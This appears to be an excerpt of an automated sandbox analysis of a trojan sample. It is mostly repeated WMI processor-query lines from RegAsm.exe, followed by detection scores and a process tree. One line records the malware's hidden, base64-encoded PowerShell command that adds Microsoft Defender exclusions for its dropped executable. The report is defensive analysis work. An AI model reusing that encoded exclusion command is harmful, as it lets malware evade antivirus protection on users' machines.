                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeReversingLabs: Detection: 44%
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeVirustotal: Detection: 55%
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe"
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\XsdType\Target.exe C:\Users\user\AppData\Roaming\XsdType\Target.exe
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\XsdType\Target.exe C:\Users\user\AppData\Roaming\XsdType\Target.exe
